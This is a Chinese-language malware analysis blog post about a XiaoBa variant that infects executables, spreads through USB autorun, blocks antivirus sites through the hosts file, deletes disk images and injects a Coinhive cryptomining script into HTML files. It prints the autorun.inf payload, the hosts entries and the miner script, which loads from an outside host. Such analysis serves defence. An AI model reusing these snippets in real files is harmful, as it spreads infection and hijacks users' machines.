其他攻击
XiaoBa变种分析简报
JustPlay 2018-04-25 17:11:53 1361人浏览

 概述

        XiaoBa勒索病毒,是一种新型电脑病毒,是一款国产化水平极高的勒索病毒,主要以邮件,程序木马,网页挂马的形式进行传播。这种病毒利用各种加密算法对文件进行加密,被感染者一般无法解密,必须拿到解密的私钥才有可能破解。倒计时200秒还不缴赎金,被加密的文件就会被全部销毁。

        以上说明摘自百度百科,但是我分析的这个XiaoBa变种并没有以上行为特征,不过它拥有很强的隐蔽性和感染性,并且具有文件加密,文件删除和挖矿三项主要功能。

样本分析

此样本经过微步云沙箱分析(相关链接请参见《参考链接》),确认为恶意样本

image.png

行为简图

执行简图.png

权限调整

样本运行之后,首先调整进程权限,确保自己有足够的权限进行后续的操作


路径判断:样本会判断当前的执行路径是否在%systemroot%\360\360Safe\deepscan目录下,如果不在此目录下则拷贝自身到此目录并执行。如果在此路径下,将会首先进行一些修改系统设置相关的操作:

修改文件属性

将文件属性设置为受保护的系统文件,需要在“文件夹和搜索选项”中取消“隐藏受保护的操作系统文件(推荐)”选项才可看到

禁用UAC

image.png

设置自启动,创建快捷方式

image.png

禁用注册表

image.png

不显示隐藏的文件

image.png

禁用文件夹和搜素选项

image.png

创建自启动

image.png

删除SafeBoot选项

image.png

磁盘遍历

遍历磁盘,在磁盘根目录下创建autorun.inf文件,写入如下数据,尝试进行U盘感染,并且少不了的将此文件设置为隐藏

[autorun]
 open=RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588\ZhuDongFangYu.exe
 shellexecute=RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588\ZhuDongFangYu.exe
 shell\Auto\command=RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588\ZhuDongFangYu.exe
shell\open=RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588\ZhuDongFangYu.exe
 shell\open\Command=RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588\ZhuDongFangYu.exe

创建文件夹RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588,并且将自身文件拷贝进来

重写hosts文件,重定向安全厂商网址

"127.0.0.0 360.qihoo.com"
 "127.0.0.1 qihoo.com"
 "127.0.0.1 www.qihoo.com"
 "127.0.0.1 www.qihoo.cn"
 "127.0.0.1 124.40.51.17"
 "127.0.0.1 58.17.236.92"
 "127.0.0.1 www.kaspersky.com"
 "127.0.0.1 60.210.176.251"
 "127.0.0.1 www.cnnod32.cn"
 "127.0.0.1 www.lanniao.org"
 "127.0.0.1 www.nod32club.com"
 "127.0.0.1 www.dswlab.com"
 "127.0.0.1 bbs.sucop.com"
 "127.0.0.1 www.virustotal.com"
 "127.0.0.1 tool.ikaka.com"
 "127.0.0.1 www.jiangmin.com"
 "127.0.0.1 www.duba.net"
 "127.0.0.1 www.eset.com.cn"
 "127.0.0.1 www.nod32.com"
 "127.0.0.1 shadu.duba.net"
 "127.0.0.1 union.kingsoft.com"
 "127.0.0.1 www.kaspersky.com.cn"
 "127.0.0.1 kaspersky.com.cn"
 "127.0.0.1 virustotal.com"
 "127.0.0.1 www.360.cn"
 "127.0.0.1 www.360safe.cn"
 "127.0.0.1 www.360safe.com"
 "127.0.0.1 www.chinakv.com"
 "127.0.0.1 www.rising.com.cn"
 "127.0.0.1 rising.com.cn"
 "127.0.0.1 dl.jiangmin.com"
 "127.0.0.1 jiangmin.com",

正题

最后创建线程,在线程函数中,XiaoBa会遍历所有文件,查找扩展名为.exe,.com,.scr,.pif,.html,.htm,.gho,.iso的文件,针对不同的扩展名执行不同的操作

.exe,.com,.scr,.pif

重写这些文件,将自身文件写入这些文件的开头,后期如果再运行这些文件的话,就会运行ZhuDongFangYu.exe

image.png

.html,.htm

在这些文件的末尾添加挖矿脚本

"\r\n"
 "<script type=\"text/javascript\" src=\"https://coinhive.com/lib/coinhive.min.js\"></script>\r\n"
 "<script>\r\n"
 "var miner = new CoinHive.Anonymous('yuNWeGn9GWL72dONBX9WNEj1aVHxg49E');\r\n"
 "miner.start();\r\n"
 "</script>"

.gho,.iso

对于这些文件,直接删除


一个有意思的点是这个样本的图标是360杀毒的图标,创建的文件夹名也是360,而且经过它重写的可执行程序的图标都换成了360的图标,奇虎的人会有什么感想。

          image.png

参考链接:

https://s.threatbook.cn/report/win7_sp1_enx86_office2013/11abb44de53807e32980a010a473514694f901841e63ab33f5e0ff8754009b47/?utm_campaign=KF&utm_medium=tz&utm_source=Adconly&gio_link_id=1P6B8dPd







Hash(1) 检测结果 关联样本 微步标签 < 1/1 >
评论 20
匿名用户 2018-05-22 16:04:21 回复
还有这种操作?
匿名用户 2018-05-21 16:18:06 回复
不错
匿名用户 2018-05-21 16:12:01 回复
姿势可以
匿名用户 2018-05-21 16:10:38 回复
姿势可以
匿名用户 2018-05-21 16:07:56 回复
学习学习1
h0st 2018-05-21 16:07:22 回复
新姿势学习下。。。
匿名用户 2018-05-21 16:06:34 回复
学习学习
匿名用户 2018-05-21 16:04:47 回复
厉害了
匿名用户 2018-05-21 15:57:10 回复
学习个
匿名用户 2018-05-21 15:50:20 回复
niupi 1
匿名用户 2018-05-21 15:49:22 回复
niupi
匿名用户 2018-05-21 15:48:06 回复
77777
匿名用户 2018-05-21 15:47:01 回复
666
匿名用户 2018-05-21 15:45:43 回复
666
匿名用户 2018-05-21 15:44:38 回复
666
匿名用户 2018-04-29 23:55:37 回复
77777
匿名用户 2018-04-29 23:55:33 回复
6666
匿名用户 2018-04-29 23:55:26 回复
...
neo 2018-04-29 23:55:23 回复
6666666
匿名用户 2018-04-26 12:26:56 回复
这不是早就被扒皮了的么。